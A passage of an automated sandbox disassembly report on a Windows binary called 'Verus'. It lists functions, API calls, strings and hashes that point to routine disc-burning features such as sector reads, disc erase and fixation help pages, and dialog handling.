Similarity

API ID: CountTick
String ID: Retry on sector %u failed.$ Warning: Failed to read sector range %u-%u
API String ID: 536389180-3548027478
Opcode ID: 72ea56ef093e365a51012dfa3efd459b92a9c5fef7c841ced817f747bb3172c6
Instruction ID: 60aac8157db7d9d73ca8c5d167e8a254692360eb436eed1e7c320e6ec599eb72
Opcode Fuzzy Hash: 72ea56ef093e365a51012dfa3efd459b92a9c5fef7c841ced817f747bb3172c6
Instruction Fuzzy Hash: B251AB70A09301ABD740EF19D881A2FB7E5FFC8704F55691EF88197321E739E8418B9A

Function 004703E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

std::runtime_error::runtime_error.LIBCPMTD ref: 00470442
__CxxThrowException@8.LIBCMT ref: 00470459

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

DIL, xrefs: 00470451
map/set<T> too long, xrefs: 00470416

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
String ID: DIL$map/set<T> too long
API String ID: 1493993918-310265113
Opcode ID: d086f1580706c4dfe1378399d54b60ab665e133d2d9529504ca1302c7a53caec
Instruction ID: 22a5354781528bcbc2ffd0482d7e01fe52a004203b2d476f32569ee87537c37c
Opcode Fuzzy Hash: d086f1580706c4dfe1378399d54b60ab665e133d2d9529504ca1302c7a53caec
Instruction Fuzzy Hash: 327155B0605645EFC314DF18C180A96FBE1BF99314F69C68EE4494B752C738EC82CB99

Function 0046A980 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

std::runtime_error::runtime_error.LIBCPMTD ref: 0046A9E2
__CxxThrowException@8.LIBCMT ref: 0046A9F9

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

DIL, xrefs: 0046A9F1
map/set<T> too long, xrefs: 0046A9B6

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
String ID: DIL$map/set<T> too long
API String ID: 1493993918-310265113
Opcode ID: bfbf1c96390d184fafb7543f100121e8b4bb2ceb8d5e9c0e69ada2aeeba4b2e4
Instruction ID: 8abcb7b9b66651f5488ac3f3980a77f369c92716f888d42cf6a45b340fdb9fc0
Opcode Fuzzy Hash: bfbf1c96390d184fafb7543f100121e8b4bb2ceb8d5e9c0e69ada2aeeba4b2e4
Instruction Fuzzy Hash: 4C7156B0605A419FC310CF14C284A26FBE2BB59714F59868EE4495B352D738FC92CF9A

Function 0045E200 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000446,?), ref: 0045E252
SetDlgItemTextW.USER32(?,00000449,?), ref: 0045E293
SetDlgItemTextW.USER32(?,000003FD,?), ref: 0045E2D4

Strings

projectprop, xrefs: 0045E215

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: projectprop
API String ID: 3367045223-1887307507
Opcode ID: 9067e1c300c1107ff3e5aab435b5f7838ebce959a8d216b817734f324a49be45
Instruction ID: 54bec640ec363e6ce98e0097c587447e027b9a1bf3f5626c73725201c085ae0b
Opcode Fuzzy Hash: 9067e1c300c1107ff3e5aab435b5f7838ebce959a8d216b817734f324a49be45
Instruction Fuzzy Hash: 8421EBB57403006BD618DE56DC82F7B739E9BC4700F10485EFA554B3C2DA65ED08476A

Function 0044E340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000FC), ref: 0044E3FB
GetWindowLongW.USER32(00000000,000000FC), ref: 0044E423
SetWindowLongW.USER32(?,000000FC,?), ref: 0044E434

Part of subcall function 0044E010: CallWindowProcW.USER32(?,?,?,?,?), ref: 0044E026

Strings

$, xrefs: 0044E3A1

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: e24ad20f87f3b20224f10ecc3aeda0e35ace8f2c721e4bf62b2fafebeb8f66ff
Instruction ID: 22ecab77a293b38afc14bd5e4c9c37b4424eb4ef434c5216ad7662a9a0aaf636
Opcode Fuzzy Hash: e24ad20f87f3b20224f10ecc3aeda0e35ace8f2c721e4bf62b2fafebeb8f66ff
Instruction Fuzzy Hash: FF3106B1608310AFD324DF1AD88091BF7E9FFC8314F548A1EF59587250D676E9418B5A

Function 0041ACF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

RIFF, xrefs: 0041ADA8
WAVE, xrefs: 0041ADF2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID: RIFF$WAVE
API String ID: 0-2335251279
Opcode ID: 0135bc5eeb0fcd12197d260310dccc9d9e0a3eaa2b507ea5436a1560379429a4
Instruction ID: 08f662ec1a11fc271d3a18168633796cffff024e7f1b4bdfd1250f093e43f943
Opcode Fuzzy Hash: 0135bc5eeb0fcd12197d260310dccc9d9e0a3eaa2b507ea5436a1560379429a4
Instruction Fuzzy Hash: 68318271548700AFC604EB61C842FEFB7E4AB94B14F404E1EF696831D1EB789908CB6B

Function 00462650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000489,?), ref: 0046269F
SetDlgItemTextW.USER32(?,00000498,?), ref: 004626C4
SetDlgItemTextW.USER32(?,00000499,?), ref: 004626E9

Strings

read, xrefs: 00462665

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: read
API String ID: 3367045223-2555855207
Opcode ID: 6a4c754fbea4f3fdbb94bb6e14a19305a7f26b78ace86fe0b31cdb3221ef0db7
Instruction ID: ec9f1946935c3fa9dbcc8b09e7a8a62d4a502f81a8b1fc5e3f7d78cd68311d85
Opcode Fuzzy Hash: 6a4c754fbea4f3fdbb94bb6e14a19305a7f26b78ace86fe0b31cdb3221ef0db7
Instruction Fuzzy Hash: 5521C3F93407007FD614A755CD82DBBB39A9BC4710F14C81FBA595B382EAB4EC01876A

Function 004668C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000001,?), ref: 00466909
SetDlgItemTextW.USER32(?,00000002,?), ref: 00466928
SetDlgItemTextW.USER32(?,000003FA,?), ref: 0046694D

Strings

progress, xrefs: 004668D5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: progress
API String ID: 3367045223-570552902
Opcode ID: 10b3b47d0eef02c661ebd031305bfc77e91fce6d82aebfde134875258fb899cc
Instruction ID: bccae4aea859a0b8b0c4650bb98709df3540102f11dd60eb28357e5887c896c0
Opcode Fuzzy Hash: 10b3b47d0eef02c661ebd031305bfc77e91fce6d82aebfde134875258fb899cc
Instruction Fuzzy Hash: 0B0102BA2402007FD908AB508882EBB635ADBC4724F11C15FFE454F382DA75AC068B66

Function 00460D50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000400,?), ref: 00460D9F
SetDlgItemTextW.USER32(?,0000042A,?), ref: 00460DC4
SetDlgItemTextW.USER32(?,0000042B,?), ref: 00460DE9

Strings

projectprop, xrefs: 00460D65

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: projectprop
API String ID: 3367045223-1887307507
Opcode ID: a64c7835bcb23c70f9985b440a0e4be1029e7bd58ab23741bd3d81e575e6551e
Instruction ID: 17be2112e1a675139f91e8531aabd5668cad6fe2061050213f169933eea0de32
Opcode Fuzzy Hash: a64c7835bcb23c70f9985b440a0e4be1029e7bd58ab23741bd3d81e575e6551e
Instruction Fuzzy Hash: B70182BA3406006FD908AB90DC81DBB635ADBC4714F10C64EFF455F386EA74EC028B6A

Function 00426C40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 004265D0: _strncmp.LIBCMT ref: 004265EE

_strncmp.LIBCMT ref: 00426C5E
_strncmp.LIBCMT ref: 00426C9B

Strings

Re-load, xrefs: 00426C95
Fixating time:, xrefs: 00426C58

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _strncmp
String ID: Fixating time:$Re-load
API String ID: 909875538-2391843003
Opcode ID: 14dc6c416b3845f5d0cd8005c177c401cb80395dffa38ace152d7f2b881d5146
Instruction ID: 16bc9f7dd4012e5349ad0565fc58420a5a3a28190e12bbb821a308807da2d1c9
Opcode Fuzzy Hash: 14dc6c416b3845f5d0cd8005c177c401cb80395dffa38ace152d7f2b881d5146
Instruction Fuzzy Hash: D21104753007006BDA20EB25DC41F6B7365EFC6720F01461EFE1997380EA75F841C6A9

Function 0042F180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(AD5E0258,?,?,-00000048,?,AD5E0258), ref: 0042F198
lstrcpyW.KERNEL32(?,\\.\X:,?,?,-00000048,?,AD5E0258), ref: 0042F1B2
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,?,-00000048,?,AD5E0258), ref: 0042F1D9

Strings

\\.\X:, xrefs: 0042F1A8

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CloseCreateFileHandlelstrcpy
String ID: \\.\X:
API String ID: 3205445448-2789755602
Opcode ID: 52913b2f4ebac4806b999b4e04e899e6c38358bdfcb8a2fdae6e8790b19435be
Instruction ID: 6c1e9baa3824c432848d715c8ca502ee85653fd3e013a20c47c885f6ed25ac80
Opcode Fuzzy Hash: 52913b2f4ebac4806b999b4e04e899e6c38358bdfcb8a2fdae6e8790b19435be
Instruction Fuzzy Hash: 420175B1600301ABD614EF28EC12F5B77E4AF88710F904A2EB592D72D0DB74D558C79A

Function 00422080 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

std::runtime_error::runtime_error.LIBCPMTD ref: 004220EC
__CxxThrowException@8.LIBCMT ref: 00422103

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

DIL, xrefs: 004220FB
list<T> too long, xrefs: 004220B8

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
String ID: DIL$list<T> too long
API String ID: 1493993918-14914485
Opcode ID: 10f8447884597732bccf8b94d8a7e811e74f244ac9b719e9a1dc3b6de8db0e24
Instruction ID: 2c7e449752eebae828632e2dfb9cc98fd75d38582ca157cd4e24014a94b00f73
Opcode Fuzzy Hash: 10f8447884597732bccf8b94d8a7e811e74f244ac9b719e9a1dc3b6de8db0e24
Instruction Fuzzy Hash: AC01C4B61083509FC304DF14C541F5BBBE4AB98718F104A2EF45993380E778E548CB5A

Function 0041A5A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00000103,00000103), ref: 0041A5C4

Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 0047711E
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477135
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477154

lstrcatW.KERNEL32(?,00000000), ref: 0041A5E8
lstrcatW.KERNEL32(?,::/how_to_use/working_with_projects/add_boot_image.html), ref: 0041A5F4

Part of subcall function 00479694: LoadLibraryA.KERNEL32(?,?,74E2F770), ref: 004796E1
Part of subcall function 00479694: LoadLibraryA.KERNEL32(hhctrl.ocx,?,74E2F770), ref: 004796F7

Strings

::/how_to_use/working_with_projects/add_boot_image.html, xrefs: 0041A5EA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$LibraryLoadlstrcat$FileModuleName
String ID: ::/how_to_use/working_with_projects/add_boot_image.html
API String ID: 600303151-1304075080
Opcode ID: fa5b7b314ff65a7e87fa6812b83d9575fe85e60167e210dbd262d8f57479c59c
Instruction ID: df31642c5e001af46b896e385f49e857e5ba74f90facf8b19f2d8066ff5c1cd7
Opcode Fuzzy Hash: fa5b7b314ff65a7e87fa6812b83d9575fe85e60167e210dbd262d8f57479c59c
Instruction Fuzzy Hash: B2F0A4B65003047FE320EB61DC57FAB77A8EBC4710F408E2EF15586181EA74E504C796

Function 0043B060 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00000103,00000103), ref: 0043B084

Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 0047711E
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477135
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477154

lstrcatW.KERNEL32(?,00000000), ref: 0043B0A8
lstrcatW.KERNEL32(?,::/how_to_use/erase_disc.html), ref: 0043B0B4

Part of subcall function 00479694: LoadLibraryA.KERNEL32(?,?,74E2F770), ref: 004796E1
Part of subcall function 00479694: LoadLibraryA.KERNEL32(hhctrl.ocx,?,74E2F770), ref: 004796F7

Strings

::/how_to_use/erase_disc.html, xrefs: 0043B0AA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$LibraryLoadlstrcat$FileModuleName
String ID: ::/how_to_use/erase_disc.html
API String ID: 600303151-2889263830
Opcode ID: 685989445e9e21243ea5fc69fe37adf5428c68d859e243d27d50c42a4eb10d3f
Instruction ID: 1ad1518ee2c4d6eae7d3ff31df94e037f806520ee236b19b29c10cecbbd0bf52
Opcode Fuzzy Hash: 685989445e9e21243ea5fc69fe37adf5428c68d859e243d27d50c42a4eb10d3f
Instruction Fuzzy Hash: CBF0A4B65003047FE324EB61DC57FAB77A8EBC4710F408E2EB15586181EA74E504C7A6

Function 0043D100 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00000103,00000103), ref: 0043D124

Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 0047711E
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477135
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477154

lstrcatW.KERNEL32(?,00000000), ref: 0043D148
lstrcatW.KERNEL32(?,::/how_to_use/fixate_disc.html), ref: 0043D154

Part of subcall function 00479694: LoadLibraryA.KERNEL32(?,?,74E2F770), ref: 004796E1
Part of subcall function 00479694: LoadLibraryA.KERNEL32(hhctrl.ocx,?,74E2F770), ref: 004796F7

Strings

::/how_to_use/fixate_disc.html, xrefs: 0043D14A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
